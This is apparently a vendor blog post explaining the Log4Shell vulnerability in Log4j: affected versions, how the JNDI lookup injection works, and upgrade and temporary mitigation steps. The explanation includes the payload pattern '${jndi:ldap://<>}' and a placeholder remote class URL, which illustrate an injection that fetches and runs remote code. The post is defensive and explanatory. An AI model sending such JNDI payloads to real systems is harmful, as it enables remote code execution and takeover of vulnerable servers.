NexTurn

What We Know About Log4J And It’s Mitigation?

Log4j is a java-based logging framework which us widely used in an enterprise services, websites, and applications. On Dec 9th,  A 0-day exploit was discovered that results in Remote Code Execution (RCE) by logging a jndi string. This exploit is known as “Log4Shell” and “Logjam.”. Using this vulnerability, an unauthenticated remote actor could exploit this to take control of an affected system. The adversary can then steal information, launch ransomware, or conduct other malicious activity.

Impacted applications.

Many services have been identified to be vulnerable to this exploit. This includes services such as public cloud, CDN, DB, OS, Web/App Servers, API management, APM, Security software and others. Compiled list of services that were affect are given  here This vulnerability affects anybody who’s using the log4j packages (log4j-core, log4j-api, etc) i.e everyone who uses Java, Scala, Groovy, and Clojure. Though  JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected, as in these versions com.sun.jndi.ldap.object.trustURLCodebase is set to false i.e JNDI cannot load remote code using LDAP, there can be other attacks targeting this vulnerability  eg An attack targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers can result in remote execution. 

Affected liberary version

log4j v2​ Almost all versions (2.0-beta9 <= Apache log4j <= 2.14.1) of log4j version 2 are affected – CVE-2021-44228   Please note that log4j v1​ is vulnerable to other RCE attacks – CVE-2019-17571. It is recommended to upgrade this to latest version

How this exploit works

User sends the request to the server. The malicious code is embedded in the body or the header The server logs the incoming data containing the malicious payload: ${jndi:ldap://<>} (where remote url is the hacker’s server). The log4j executes log statements and this server makes a request to remote url using JNDI. The remote server responds with a path to another Java class file (ex: [http://%3c%3cremote]http://<>/XYZ.class). This will be injected into the server process. The injected java class executes in the jvm and allows a hacker to execute arbitrary code in the server.

Mitigation


Log4j have released version 2.15.0 without this vulnerability.

Permanent Solution

If upgrade is possible then
  • Log4j needs to be upgraded to the 2.15.0 version and the applcation must be redeployed.
  • Any dependent services that use log4j needs to be upgraded to the recommended version or follow the product advisory bulletin.

Temporary Solution

  • If application is using 2.10.0 and above, then set the log4j2.formatMsgNoLookups property as true when starting the application (jvm) or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
  • If application is using versions 2.0-beta9 to 2.10.0, then remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class or substitute an empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to application’s or stack’s classloading documentation to understand this behavior.
  • Check for all the applications that uses log4j-core*.java and monitor the logs for malicious code execution.